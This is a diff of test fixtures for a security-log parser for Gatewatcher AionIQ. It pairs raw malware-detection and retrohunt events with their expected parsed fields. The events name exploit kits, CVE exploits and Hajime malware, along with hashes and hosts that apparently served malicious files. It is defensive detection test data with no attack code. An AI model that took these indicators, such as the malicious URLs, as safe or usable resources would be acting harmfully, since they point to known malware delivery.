+    "message": "{\"timestamp\":\"2023-03-22T10:35:22.615360+0000\",\"analyzed_infected\":10,\"detail_threat_found\":\"Infected : Script.SWF.CVE-2014-0515+.C107 (B), Exp.SWF.Angler.D, Script.SWF.CVE-2014-0515+.C107, SWF/Exploit.ExKit.J trojan, Exploit.SWF.Agent.ja, Exploit.Agent.Script.371, Exploit.Swf.Agent.dvtnkm, Script.SWF.CVE-2014-0515++.C118, EXP/FLASH.Pubenush.E.Gen, Exploit.SWF\",\"timestamp_detected\":\"2023-03-22T10:35:22.615Z\",\"uuid\":\"2103a99c-549e-49b7-bbef-68459e6cc44e\",\"severity\":1,\"dest_port\":19609,\"detail_wait_time\":320265,\"host\":\"gcap-xxxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"timestamp_analyzed\":\"2023-03-22T10:53:13.408Z\",\"@timestamp\":\"2023-03-22T10:53:13.408Z\",\"file_type_description\":\"Macromedia Flash Player\",\"fileinfo\":{\"sha256\":\"350836364013549b6a76aab79d57d109df6acc143759e24a952d3ff5d6a76ec4\",\"file_id\":379,\"magic\":\"Macromedia Flash data (compressed), version 14\",\"tx_id\":1,\"state\":\"CLOSED\",\"filename\":\"/6SuCHKKkf8Sf1aFXJPqD0R6r3oEDCrbwHFm23EU-Af2zwWdHgpn6mEGu5XlxFust\",\"sid\":[1100020],\"stored\":true,\"md5\":\"67ca9a31f220bc7b68f203c07ad668b9\",\"gaps\":false,\"size\":77068},\"analyzed_suspicious\":0,\"analyzers_up\":16,\"app_proto\":\"http\",\"engines_last_update_date\":\"2023-03-08T19:03:00Z\",\"total_found\":\"10/16\",\"file_type\":\"application/x-shockwave-flash\",\"detail_scan_time\":13425,\"processing_time\":333690,\"SHA256\":\"350836364013549b6a76aab79d57d109df6acc143759e24a952d3ff5d6a76ec4\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"analyzed_clean\":5,\"event_type\":\"malware\",\"http\":{\"http_method\":\"GET\",\"http_port\":8080,\"protocol\":\"HTTP/1.1\",\"status\":200,\"hostname\":\"tsevid-synonymi.justdanceatsea.com\",\"url\":\"/6SuCHKKkf8Sf1aFXJPqD0R6r3oEDCrbwHFm23EU-Af2zwWdHgpn6mEGu5XlxFust\",\"length\":77068,\"http_content_type\":\"application/x-shockwave-flash\",\"http_user_agent\":\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)\",\"http_refer\":\"http://tsevid-synonymi.justdanceatsea.com:8080/ndf4xx22ci.php\"},\"type\":\"malcore\",\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"state\":\"Infected\",\"gcap\":\"gcap-xxxxxxxx.domain.local\",\"flow_id\":1910314914537014,\"reporting_token\":\"No GBOX\",\"src_port\":8080,\"analyzed_other\":1,\"engine_id\":{\"4\":{\"id\":\"32f2f45e6d9faf46e6954356a710208d412fac5181f6c641e34cb9956a133684\",\"threat_details\":\"SWF/Exploit.ExKit.J trojan\",\"scan_result\":\"INFECTED\"},\"1\":{\"id\":\"054a20c51cbe9d2cc7d6a237d6cd4e08ab1a67e170b371e632995766d3ba81af\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"9\":{\"id\":\"95603b80d80fa3e98b6faf07418a55ed0b035d19209e3ad4f1858f6b46fa070a\",\"threat_details\":\"Script.SWF.CVE-2014-0515++.C118\",\"scan_result\":\"INFECTED\"},\"14\":{\"id\":\"ecc47e2309be9838d6dc2c5157be1a840950e943f5aaca6637afca11516c3eaf\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"8\":{\"id\":\"714eca0a6475fe7d2bf9a24bcae343f657b230ff68acd544b019574f1392de77\",\"threat_details\":\"Exploit.Swf.Agent.dvtnkm\",\"scan_result\":\"INFECTED\"},\"7\":{\"id\":\"527db072abcf877d4bdcd0e9e4ce12c5d769621aa65dd2f7697a3d67de6cc737\",\"threat_details\":\"Exploit.Agent.Script.371\",\"scan_result\":\"INFECTED\"},\"2\":{\"id\":\"0ff95ddb1117d8f36124f6eac406dbbf9f17e3dd89f9bb1bd600f6ad834c25db\",\"threat_details\":\"Exp.SWF.Angler.D\",\"scan_result\":\"INFECTED\"},\"11\":{\"id\":\"ad05e0dc742bcd6251af91bd07ef470c699d5aebbb2055520b07021b14d7380c\",\"threat_details\":\"\",\"scan_result\":\"NOT_SCANNED\"},\"12\":{\"id\":\"af6868a2b87b3388a816e09d2b282629ccf883b763b3691368a27fbd6f6cd51a\",\"threat_details\":\"EXP/FLASH.Pubenush.E.Gen\",\"scan_result\":\"INFECTED\"},\"10\":{\"id\":\"a9b912e461cec506780d8ad8e785cca6b233ad7c72335c262b0a4ab189afa713\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"3\":{\"id\":\"312a189607571ec2c7544636be405f10889e73d061e0ed77ca0eca97a470838d\",\"threat_details\":\"Script.SWF.CVE-2014-0515+.C107\",\"scan_result\":\"INFECTED\"},\"6\":{\"id\":\"4ca73ae4b92fd7ddcda418e6b70ced0481ac2d878c48e61b686d0c9573c331dc\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"13\":{\"id\":\"b14014e40c0e672e050ad9c210a68a5303ce7facabae9eb2ee07ddf97dc0da0e\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"0\":{\"id\":\"038e407ba285f0e01dd30c6e4f77ec19bad5ed3dc866a2904ae6bf46baa14b74\",\"threat_details\":\"Script.SWF.CVE-2014-0515+.C107 (B)\",\"scan_result\":\"INFECTED\"},\"5\":{\"id\":\"3bfeb615a695c5ebaac5ade948ffae0c3cfec3787d4625e3abb27fa3c2867f53\",\"threat_details\":\"Exploit.SWF.Agent.ja\",\"scan_result\":\"INFECTED\"},\"15\":{\"id\":\"fe665976a02d03734c321007328109ab66823b260a8eea117d2ab49ee9dfd3f1\",\"threat_details\":\"Exploit.SWF\",\"scan_result\":\"INFECTED\"}},\"proto\":\"TCP\",\"code\":1,\"analyzed_error\":0,\"@version\":\"1\",\"magic_details\":\"Macromedia Flash data (compressed), version 14\"}"
+  },
+  "expected": {
+    "message": "{\"timestamp\":\"2023-03-22T10:35:22.615360+0000\",\"analyzed_infected\":10,\"detail_threat_found\":\"Infected : Script.SWF.CVE-2014-0515+.C107 (B), Exp.SWF.Angler.D, Script.SWF.CVE-2014-0515+.C107, SWF/Exploit.ExKit.J trojan, Exploit.SWF.Agent.ja, Exploit.Agent.Script.371, Exploit.Swf.Agent.dvtnkm, Script.SWF.CVE-2014-0515++.C118, EXP/FLASH.Pubenush.E.Gen, Exploit.SWF\",\"timestamp_detected\":\"2023-03-22T10:35:22.615Z\",\"uuid\":\"2103a99c-549e-49b7-bbef-68459e6cc44e\",\"severity\":1,\"dest_port\":19609,\"detail_wait_time\":320265,\"host\":\"gcap-xxxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"timestamp_analyzed\":\"2023-03-22T10:53:13.408Z\",\"@timestamp\":\"2023-03-22T10:53:13.408Z\",\"file_type_description\":\"Macromedia Flash Player\",\"fileinfo\":{\"sha256\":\"350836364013549b6a76aab79d57d109df6acc143759e24a952d3ff5d6a76ec4\",\"file_id\":379,\"magic\":\"Macromedia Flash data (compressed), version 14\",\"tx_id\":1,\"state\":\"CLOSED\",\"filename\":\"/6SuCHKKkf8Sf1aFXJPqD0R6r3oEDCrbwHFm23EU-Af2zwWdHgpn6mEGu5XlxFust\",\"sid\":[1100020],\"stored\":true,\"md5\":\"67ca9a31f220bc7b68f203c07ad668b9\",\"gaps\":false,\"size\":77068},\"analyzed_suspicious\":0,\"analyzers_up\":16,\"app_proto\":\"http\",\"engines_last_update_date\":\"2023-03-08T19:03:00Z\",\"total_found\":\"10/16\",\"file_type\":\"application/x-shockwave-flash\",\"detail_scan_time\":13425,\"processing_time\":333690,\"SHA256\":\"350836364013549b6a76aab79d57d109df6acc143759e24a952d3ff5d6a76ec4\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"analyzed_clean\":5,\"event_type\":\"malware\",\"http\":{\"http_method\":\"GET\",\"http_port\":8080,\"protocol\":\"HTTP/1.1\",\"status\":200,\"hostname\":\"tsevid-synonymi.justdanceatsea.com\",\"url\":\"/6SuCHKKkf8Sf1aFXJPqD0R6r3oEDCrbwHFm23EU-Af2zwWdHgpn6mEGu5XlxFust\",\"length\":77068,\"http_content_type\":\"application/x-shockwave-flash\",\"http_user_agent\":\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)\",\"http_refer\":\"http://tsevid-synonymi.justdanceatsea.com:8080/ndf4xx22ci.php\"},\"type\":\"malcore\",\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"state\":\"Infected\",\"gcap\":\"gcap-xxxxxxxx.domain.local\",\"flow_id\":1910314914537014,\"reporting_token\":\"No GBOX\",\"src_port\":8080,\"analyzed_other\":1,\"engine_id\":{\"4\":{\"id\":\"32f2f45e6d9faf46e6954356a710208d412fac5181f6c641e34cb9956a133684\",\"threat_details\":\"SWF/Exploit.ExKit.J trojan\",\"scan_result\":\"INFECTED\"},\"1\":{\"id\":\"054a20c51cbe9d2cc7d6a237d6cd4e08ab1a67e170b371e632995766d3ba81af\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"9\":{\"id\":\"95603b80d80fa3e98b6faf07418a55ed0b035d19209e3ad4f1858f6b46fa070a\",\"threat_details\":\"Script.SWF.CVE-2014-0515++.C118\",\"scan_result\":\"INFECTED\"},\"14\":{\"id\":\"ecc47e2309be9838d6dc2c5157be1a840950e943f5aaca6637afca11516c3eaf\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"8\":{\"id\":\"714eca0a6475fe7d2bf9a24bcae343f657b230ff68acd544b019574f1392de77\",\"threat_details\":\"Exploit.Swf.Agent.dvtnkm\",\"scan_result\":\"INFECTED\"},\"7\":{\"id\":\"527db072abcf877d4bdcd0e9e4ce12c5d769621aa65dd2f7697a3d67de6cc737\",\"threat_details\":\"Exploit.Agent.Script.371\",\"scan_result\":\"INFECTED\"},\"2\":{\"id\":\"0ff95ddb1117d8f36124f6eac406dbbf9f17e3dd89f9bb1bd600f6ad834c25db\",\"threat_details\":\"Exp.SWF.Angler.D\",\"scan_result\":\"INFECTED\"},\"11\":{\"id\":\"ad05e0dc742bcd6251af91bd07ef470c699d5aebbb2055520b07021b14d7380c\",\"threat_details\":\"\",\"scan_result\":\"NOT_SCANNED\"},\"12\":{\"id\":\"af6868a2b87b3388a816e09d2b282629ccf883b763b3691368a27fbd6f6cd51a\",\"threat_details\":\"EXP/FLASH.Pubenush.E.Gen\",\"scan_result\":\"INFECTED\"},\"10\":{\"id\":\"a9b912e461cec506780d8ad8e785cca6b233ad7c72335c262b0a4ab189afa713\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"3\":{\"id\":\"312a189607571ec2c7544636be405f10889e73d061e0ed77ca0eca97a470838d\",\"threat_details\":\"Script.SWF.CVE-2014-0515+.C107\",\"scan_result\":\"INFECTED\"},\"6\":{\"id\":\"4ca73ae4b92fd7ddcda418e6b70ced0481ac2d878c48e61b686d0c9573c331dc\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"13\":{\"id\":\"b14014e40c0e672e050ad9c210a68a5303ce7facabae9eb2ee07ddf97dc0da0e\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"0\":{\"id\":\"038e407ba285f0e01dd30c6e4f77ec19bad5ed3dc866a2904ae6bf46baa14b74\",\"threat_details\":\"Script.SWF.CVE-2014-0515+.C107 (B)\",\"scan_result\":\"INFECTED\"},\"5\":{\"id\":\"3bfeb615a695c5ebaac5ade948ffae0c3cfec3787d4625e3abb27fa3c2867f53\",\"threat_details\":\"Exploit.SWF.Agent.ja\",\"scan_result\":\"INFECTED\"},\"15\":{\"id\":\"fe665976a02d03734c321007328109ab66823b260a8eea117d2ab49ee9dfd3f1\",\"threat_details\":\"Exploit.SWF\",\"scan_result\":\"INFECTED\"}},\"proto\":\"TCP\",\"code\":1,\"analyzed_error\":0,\"@version\":\"1\",\"magic_details\":\"Macromedia Flash data (compressed), version 14\"}"
+  }
+}
\ No newline at end of file
diff --git a/GateWatcher/aioniq/tests/malcore_event.json b/GateWatcher/aioniq/tests/malcore_event.json
deleted file mode 100644
index bbe92dfe5..000000000
--- a/GateWatcher/aioniq/tests/malcore_event.json
+++ /dev/null
@@ -1,105 +0,0 @@
-{
-  "input": {
-    "message": "{\"@timestamp\":\"2022-06-03T15:00:20.531Z\",\"detail_wait_time\":18,\"event_type\":\"malware\",\"total_found\":\"3/16\",\"type\":\"malcore\",\"analyzed_clean\":13,\"analyzed_error\":0,\"SHA256\":\"2c36fbcbac3e57df410f6613180fe572015adba62d0f1bd98c13a1535d64703c\",\"dest_port\":49804,\"timestamp\":\"2022-06-03T14:59:08.780474+0000\",\"state\":\"Infected\",\"engine_id\":{\"3\":{\"scan_result\":\"CLEAN\",\"id\":\"312a189607571ec2c7544636be405f10889e73d061e0ed77ca0eca97a470838d\",\"threat_details\":\"\"},\"4\":{\"scan_result\":\"INFECTED\",\"id\":\"32f2f45e6d9faf46e6954356a710208d412fac5181f6c641e34cb9956a133684\",\"threat_details\":\"Win32/Exploit.CVE-2022-30190.A trojan\"},\"6\":{\"scan_result\":\"CLEAN\",\"id\":\"4ca73ae4b92fd7ddcda418e6b70ced0481ac2d878c48e61b686d0c9573c331dc\",\"threat_details\":\"\"},\"10\":{\"scan_result\":\"CLEAN\",\"id\":\"a9b912e461cec506780d8ad8e785cca6b233ad7c72335c262b0a4ab189afa713\",\"threat_details\":\"\"},\"13\":{\"scan_result\":\"CLEAN\",\"id\":\"b14014e40c0e672e050ad9c210a68a5303ce7facabae9eb2ee07ddf97dc0da0e\",\"threat_details\":\"\"},\"2\":{\"scan_result\":\"CLEAN\",\"id\":\"0ff95ddb1117d8f36124f6eac406dbbf9f17e3dd89f9bb1bd600f6ad834c25db\",\"threat_details\":\"\"},\"12\":{\"scan_result\":\"CLEAN\",\"id\":\"af6868a2b87b3388a816e09d2b282629ccf883b763b3691368a27fbd6f6cd51a\",\"threat_details\":\"\"},\"1\":{\"scan_result\":\"INFECTED\",\"id\":\"054a20c51cbe9d2cc7d6a237d6cd4e08ab1a67e170b371e632995766d3ba81af\",\"threat_details\":\"Exploit/HTML.CVE-2022-30190.S1841\"},\"14\":{\"scan_result\":\"CLEAN\",\"id\":\"ecc47e2309be9838d6dc2c5157be1a840950e943f5aaca6637afca11516c3eaf\",\"threat_details\":\"\"},\"9\":{\"scan_result\":\"CLEAN\",\"id\":\"95603b80d80fa3e98b6faf07418a55ed0b035d19209e3ad4f1858f6b46fa070a\",\"threat_details\":\"\"},\"15\":{\"scan_result\":\"CLEAN\",\"id\":\"fe665976a02d03734c321007328109ab66823b260a8eea117d2ab49ee9dfd3f1\",\"threat_details\":\"\"},\"7\":{\"scan_result\":\"CLEAN\",\"id\":\"527db072abcf877d4bdcd0e9e4ce12c5d769621aa65dd2f7697a3d67de6cc737\",\"threat_details\":\"\"},\"5\":{\"scan_result\":\"SUSPICIOUS\",\"id\":\"3bfeb615a695c5ebaac5ade948ffae0c3cfec3787d4625e3abb27fa3c2867f53\",\"threat_details\":\"HEUR:Exploit.Script.Generic\"},\"0\":{\"scan_result\":\"CLEAN\",\"id\":\"038e407ba285f0e01dd30c6e4f77ec19bad5ed3dc866a2904ae6bf46baa14b74\",\"threat_details\":\"\"},\"8\":{\"scan_result\":\"CLEAN\",\"id\":\"714eca0a6475fe7d2bf9a24bcae343f657b230ff68acd544b019574f1392de77\",\"threat_details\":\"\"},\"11\":{\"scan_result\":\"CLEAN\",\"id\":\"ad05e0dc742bcd6251af91bd07ef470c699d5aebbb2055520b07021b14d7380c\",\"threat_details\":\"\"}},\"detail_threat_found\":\"Infected : Exploit/HTML.CVE-2022-30190.S1841, Win32/Exploit.CVE-2022-30190.A trojan, HEUR:Exploit.Script.Generic\",\"analyzed_suspicious\":1,\"fileinfo\":{\"tx_id\":0,\"magic\":\"HTML document, ASCII text, with very long lines\",\"gaps\":false,\"md5\":\"16e3fcee85f81ec9e9c75dd13fb08c01\",\"sha256\":\"2c36fbcbac3e57df410f6613180fe572015adba62d0f1bd98c13a1535d64703c\",\"file_id\":1,\"sid\":[1100029],\"state\":\"CLOSED\",\"size\":6105,\"stored\":true,\"filename\":\"/exploit.html\"},\"host\":\"network.internal\",\"src_port\":80,\"flow_id\":1686930575880829,\"processing_time\":359,\"file_type_description\":\"Not available\",\"timestamp_analyzed\":\"2022-06-03T15:00:20.531Z\",\"dest_ip\":\"1.2.3.4\",\"reporting_token\":\"No GBOX\",\"severity\":1,\"gcenter\":[\"gcenter-nti.gatewatcher.com\",\"gcenter-nti.gatewatcher.com\"],\"analyzed_other\":0,\"analyzed_infected\":2,\"app_proto\":\"http\",\"detail_scan_time\":341,\"src_ip\":\"9.8.7.6\",\"magic_details\":\"HTML document, ASCII text, with very long lines\",\"proto\":\"TCP\",\"http\":{\"protocol\":\"HTTP/1.1\",\"hostname\":\"www.xmlformats.com\",\"http_content_type\":\"text/html\",\"length\":2485,\"http_user_agent\":\"Mozilla/4.0 (compatible; ms-office; MSOffice 16)\",\"http_method\":\"GET\",\"url\":\"/exploit.html\",\"status\":200},\"timestamp_detected\":\"2022-06-03T14:59:08.780Z\",\"analyzers_up\":16,\"file_type\":\"Not available\",\"in_iface\":\"monvirt\",\"code\":1,\"engines_last_update_date\":\"2022-06-01T21:22:55Z\",\"gcap\":\"gcap-nti.gatewatcher.com\",\"uuid\":\"73a1884d-94a6-4800-9b08-6daa3281ce8f\"}"
-  },
-  "expected": {
-    "message": "{\"@timestamp\":\"2022-06-03T15:00:20.531Z\",\"detail_wait_time\":18,\"event_type\":\"malware\",\"total_found\":\"3/16\",\"type\":\"malcore\",\"analyzed_clean\":13,\"analyzed_error\":0,\"SHA256\":\"2c36fbcbac3e57df410f6613180fe572015adba62d0f1bd98c13a1535d64703c\",\"dest_port\":49804,\"timestamp\":\"2022-06-03T14:59:08.780474+0000\",\"state\":\"Infected\",\"engine_id\":{\"3\":{\"scan_result\":\"CLEAN\",\"id\":\"312a189607571ec2c7544636be405f10889e73d061e0ed77ca0eca97a470838d\",\"threat_details\":\"\"},\"4\":{\"scan_result\":\"INFECTED\",\"id\":\"32f2f45e6d9faf46e6954356a710208d412fac5181f6c641e34cb9956a133684\",\"threat_details\":\"Win32/Exploit.CVE-2022-30190.A trojan\"},\"6\":{\"scan_result\":\"CLEAN\",\"id\":\"4ca73ae4b92fd7ddcda418e6b70ced0481ac2d878c48e61b686d0c9573c331dc\",\"threat_details\":\"\"},\"10\":{\"scan_result\":\"CLEAN\",\"id\":\"a9b912e461cec506780d8ad8e785cca6b233ad7c72335c262b0a4ab189afa713\",\"threat_details\":\"\"},\"13\":{\"scan_result\":\"CLEAN\",\"id\":\"b14014e40c0e672e050ad9c210a68a5303ce7facabae9eb2ee07ddf97dc0da0e\",\"threat_details\":\"\"},\"2\":{\"scan_result\":\"CLEAN\",\"id\":\"0ff95ddb1117d8f36124f6eac406dbbf9f17e3dd89f9bb1bd600f6ad834c25db\",\"threat_details\":\"\"},\"12\":{\"scan_result\":\"CLEAN\",\"id\":\"af6868a2b87b3388a816e09d2b282629ccf883b763b3691368a27fbd6f6cd51a\",\"threat_details\":\"\"},\"1\":{\"scan_result\":\"INFECTED\",\"id\":\"054a20c51cbe9d2cc7d6a237d6cd4e08ab1a67e170b371e632995766d3ba81af\",\"threat_details\":\"Exploit/HTML.CVE-2022-30190.S1841\"},\"14\":{\"scan_result\":\"CLEAN\",\"id\":\"ecc47e2309be9838d6dc2c5157be1a840950e943f5aaca6637afca11516c3eaf\",\"threat_details\":\"\"},\"9\":{\"scan_result\":\"CLEAN\",\"id\":\"95603b80d80fa3e98b6faf07418a55ed0b035d19209e3ad4f1858f6b46fa070a\",\"threat_details\":\"\"},\"15\":{\"scan_result\":\"CLEAN\",\"id\":\"fe665976a02d03734c321007328109ab66823b260a8eea117d2ab49ee9dfd3f1\",\"threat_details\":\"\"},\"7\":{\"scan_result\":\"CLEAN\",\"id\":\"527db072abcf877d4bdcd0e9e4ce12c5d769621aa65dd2f7697a3d67de6cc737\",\"threat_details\":\"\"},\"5\":{\"scan_result\":\"SUSPICIOUS\",\"id\":\"3bfeb615a695c5ebaac5ade948ffae0c3cfec3787d4625e3abb27fa3c2867f53\",\"threat_details\":\"HEUR:Exploit.Script.Generic\"},\"0\":{\"scan_result\":\"CLEAN\",\"id\":\"038e407ba285f0e01dd30c6e4f77ec19bad5ed3dc866a2904ae6bf46baa14b74\",\"threat_details\":\"\"},\"8\":{\"scan_result\":\"CLEAN\",\"id\":\"714eca0a6475fe7d2bf9a24bcae343f657b230ff68acd544b019574f1392de77\",\"threat_details\":\"\"},\"11\":{\"scan_result\":\"CLEAN\",\"id\":\"ad05e0dc742bcd6251af91bd07ef470c699d5aebbb2055520b07021b14d7380c\",\"threat_details\":\"\"}},\"detail_threat_found\":\"Infected : Exploit/HTML.CVE-2022-30190.S1841, Win32/Exploit.CVE-2022-30190.A trojan, HEUR:Exploit.Script.Generic\",\"analyzed_suspicious\":1,\"fileinfo\":{\"tx_id\":0,\"magic\":\"HTML document, ASCII text, with very long lines\",\"gaps\":false,\"md5\":\"16e3fcee85f81ec9e9c75dd13fb08c01\",\"sha256\":\"2c36fbcbac3e57df410f6613180fe572015adba62d0f1bd98c13a1535d64703c\",\"file_id\":1,\"sid\":[1100029],\"state\":\"CLOSED\",\"size\":6105,\"stored\":true,\"filename\":\"/exploit.html\"},\"host\":\"network.internal\",\"src_port\":80,\"flow_id\":1686930575880829,\"processing_time\":359,\"file_type_description\":\"Not available\",\"timestamp_analyzed\":\"2022-06-03T15:00:20.531Z\",\"dest_ip\":\"1.2.3.4\",\"reporting_token\":\"No GBOX\",\"severity\":1,\"gcenter\":[\"gcenter-nti.gatewatcher.com\",\"gcenter-nti.gatewatcher.com\"],\"analyzed_other\":0,\"analyzed_infected\":2,\"app_proto\":\"http\",\"detail_scan_time\":341,\"src_ip\":\"9.8.7.6\",\"magic_details\":\"HTML document, ASCII text, with very long lines\",\"proto\":\"TCP\",\"http\":{\"protocol\":\"HTTP/1.1\",\"hostname\":\"www.xmlformats.com\",\"http_content_type\":\"text/html\",\"length\":2485,\"http_user_agent\":\"Mozilla/4.0 (compatible; ms-office; MSOffice 16)\",\"http_method\":\"GET\",\"url\":\"/exploit.html\",\"status\":200},\"timestamp_detected\":\"2022-06-03T14:59:08.780Z\",\"analyzers_up\":16,\"file_type\":\"Not available\",\"in_iface\":\"monvirt\",\"code\":1,\"engines_last_update_date\":\"2022-06-01T21:22:55Z\",\"gcap\":\"gcap-nti.gatewatcher.com\",\"uuid\":\"73a1884d-94a6-4800-9b08-6daa3281ce8f\"}",
-    "event": {
-      "category": [
-        "malware"
-      ],
-      "kind": "event",
-      "severity": 1,
-      "type": [
-        "info"
-      ]
-    },
-    "@timestamp": "2022-06-03T15:00:20.531000Z",
-    "destination": {
-      "address": "1.2.3.4",
-      "ip": "1.2.3.4",
-      "port": 49804
-    },
-    "file": {
-      "hash": {
-        "md5": "16e3fcee85f81ec9e9c75dd13fb08c01",
-        "sha256": "2c36fbcbac3e57df410f6613180fe572015adba62d0f1bd98c13a1535d64703c"
-      },
-      "name": "/exploit.html",
-      "size": 6105
-    },
-    "gatewatcher": {
-      "event_type": "malware",
-      "flow_id": "1686930575880829",
-      "gcap": "gcap-nti.gatewatcher.com",
-      "gcenter": [
-        "gcenter-nti.gatewatcher.com",
-        "gcenter-nti.gatewatcher.com"
-      ],
-      "malcore": {
-        "code": "1",
-        "detail_threat_found": "Infected : Exploit/HTML.CVE-2022-30190.S1841, Win32/Exploit.CVE-2022-30190.A trojan, HEUR:Exploit.Script.Generic"
-      },
-      "reporting_token": "No GBOX",
-      "state": "Infected",
-      "timestamp_analyzed": "2022-06-03T15:00:20.531Z",
-      "timestamp_detected": "2022-06-03T14:59:08.780Z",
-      "type": "malcore"
-    },
-    "http": {
-      "request": {
-        "method": "GET"
-      },
-      "response": {
-        "status_code": 200
-      }
-    },
-    "network": {
-      "protocol": "http",
-      "transport": "TCP"
-    },
-    "observer": {
-      "hostname": "network.internal",
-      "name": "gcap-nti.gatewatcher.com",
-      "type": "firewall",
-      "version": "0.2"
-    },
-    "related": {
-      "hash": [
-        "16e3fcee85f81ec9e9c75dd13fb08c01",
-        "2c36fbcbac3e57df410f6613180fe572015adba62d0f1bd98c13a1535d64703c"
-      ],
-      "hosts": [
-        "network.internal",
-        "www.xmlformats.com"
-      ],
-      "ip": [
-        "1.2.3.4",
-        "9.8.7.6"
-      ]
-    },
-    "source": {
-      "address": "9.8.7.6",
-      "ip": "9.8.7.6",
-      "port": 80
-    },
-    "url": {
-      "domain": "www.xmlformats.com",
-      "path": "/exploit.html",
-      "registered_domain": "xmlformats.com",
-      "subdomain": "www",
-      "top_level_domain": "com"
-    },
-    "user_agent": {
-      "device": {
-        "name": "Other"
-      },
-      "name": "Outlook",
-      "original": "Mozilla/4.0 (compatible; ms-office; MSOffice 16)",
-      "os": {
-        "name": "Other"
-      },
-      "version": "2016"
-    }
-  }
-}
\ No newline at end of file
diff --git a/GateWatcher/aioniq/tests/retrohunt.json b/GateWatcher/aioniq/tests/retrohunt.json
new file mode 100644
index 000000000..39f436f31
--- /dev/null
+++ b/GateWatcher/aioniq/tests/retrohunt.json
@@ -0,0 +1,14 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Gatewatcher AionIQ",
+        "dialect_uuid": "0825709a-5f76-441e-9dfb-2b5ea6ce551c"
+      }
+    },
+    "message": "{\"external_links\":[{\"url\":\"https://urlhaus.abuse.ch/url/2269068/\",\"source_name\":\"URLHaus Abuse.ch\"}],\"relations\":[\"0e3cc27b-7999-48ce-8484-dc12b325a355\"],\"description\":\"IOC matching first tests\",\"event_type\":\"retrohunt\",\"kill_chain_phases\":[],\"timestamp_detected\":\"2023-06-09T14:08:46.845Z\",\"ioc_type\":\"Host\",\"severity\":1,\"community_id\":\"1:x0uuTl0mYnN1nwngep7+A4VH38I=\",\"ioc_creation_date\":\"2023-06-12T10:00:35+00:00\",\"targeted_countries\":[],\"ioc_value\":\"im.a.very.bad.doma.in\",\"dest_ip\":\"2.2.2.2\",\"vulnerabilities\":[],\"matched_event\":\"bd7686c8-20db-427e-941d-844a5ecfe559\",\"risk\":\"Suspicious\",\"uuid\":\"416f35ad-b954-4b6a-a886-987b826bb7f4\",\"meta_data\":{\"ssdeep\":\"1536:87vbq1lGAXSEYQjbChaAU2yU23M51DjZgSQAvcYkFtZTjzBht5:8D+CAXFYQChaAUk5ljnQssL\",\"cwe\":[],\"descriptions\":[],\"tslh\":\"T16D7312E017B517CC1371A8353BED205E9128223972AE35302E97528DF957703BAB2DBE\",\"filetype\":\"ELF 32-bit LSB executable, ARM, EABI5 version 1 (GNU/Linux)\",\"size\":78.3984375,\"usageMode\":\"hunting\"},\"flow_id\":841376349480333,\"matched_event_type\":\"alert\",\"ioc_updated_date\":\"2023-06-12T10:00:35+00:00\",\"targeted_platforms\":[\"linux\"],\"signature\":\"RetroHunt - Host - malware/Unknown - Hajime - GW Lab Test - 00100035-1206-2023-cbf5-08330f0d5bc0\",\"ioc_tags\":[\"trojan.generickd.34055387 (b)\",\"linux/hajime.a trojan\",\"e32/agent.cd\",\"linux.hajime.bc\",\"backdoor.hajime.linux.129\",\"linux/hajime.75930\",\"unix.malware.agent-6626471-0\",\"linux/hajime.nsnlw\",\"hajime\",\"elf.mirai.43048.gc\",\"trojan.elfarm32.hajime.fbhtfi\",\"trojan.linux.hajime\",\"trojan.generickd.34055387\"],\"@version\":\"1\",\"type\":\"cti\",\"targeted_organizations\":[],\"campaigns\":[],\"categories\":[\"malware\"],\"src_port\":55614,\"gcenter\":\"gcenter-xxxxxxxxxxxxxxxxx.domain.local\",\"case_id\":\"00100035-1206-2023-edb6-b38911f8ba0c\",\"dest_port\":80,\"usage_mode\":\"hunting\",\"timestamp_package\":\"2023-06-12T10:00:35.012874+0000\",\"src_ip\":\"1.1.1.1\",\"ttp\":[],\"tlp\":\"green\",\"probability\":0.5,\"gcap\":\"gcap-xxxxxxxxxxxxxxxx.domain.local\",\"@timestamp\":\"2023-06-12T10:12:39.001Z\",\"timestamp_analyzed\":\"2023-06-12T10:12:39.001Z\",\"families\":[\"Hajime\"],\"ioc_id\":\"00100035-1206-2023-cbf5-08330f0d5bc0\",\"targeted_sectors\":[],\"threat_actor\":[\"GW Lab Test\"],\"matched_app_proto\":\"http\"}"
+  },
+  "expected": {
